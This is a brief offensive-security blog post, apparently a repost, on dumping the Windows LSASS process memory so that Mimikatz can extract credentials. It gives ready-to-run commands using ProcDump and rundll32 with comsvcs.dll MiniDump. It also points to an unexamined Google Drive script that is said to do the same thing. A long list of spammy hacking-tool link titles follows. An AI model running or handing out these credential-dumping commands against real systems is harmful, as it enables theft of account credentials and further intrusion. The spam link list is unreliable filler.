LSASS Dumping Methods ( For Mimikatz )

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp

rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More information

1. World No 1 Hacker Software
2. Pentest Tools Open Source
3. Wifi Hacker Tools For Windows
4. Hacker Tools 2019
5. Hack Tools For Windows
6. Pentest Tools Bluekeep
7. Pentest Tools Download
8. What Is Hacking Tools
9. Hacker Tools For Windows
10. Hacker Tools 2019
11. Nsa Hacker Tools
12. Hacking Tools Pc
13. Nsa Hack Tools Download
14. Hack Tools For Pc
15. Ethical Hacker Tools
16. Hacker Tools Mac
17. New Hacker Tools
18. Hacker Tools Software
19. Hacking Tools For Windows 7
20. Pentest Tools List
21. Hack Website Online Tool
22. Hacking Tools Software
23. Pentest Tools Subdomain
24. Hacker Tools Apk Download
25. Physical Pentest Tools
26. Hacker Search Tools
27. What Is Hacking Tools
28. New Hacker Tools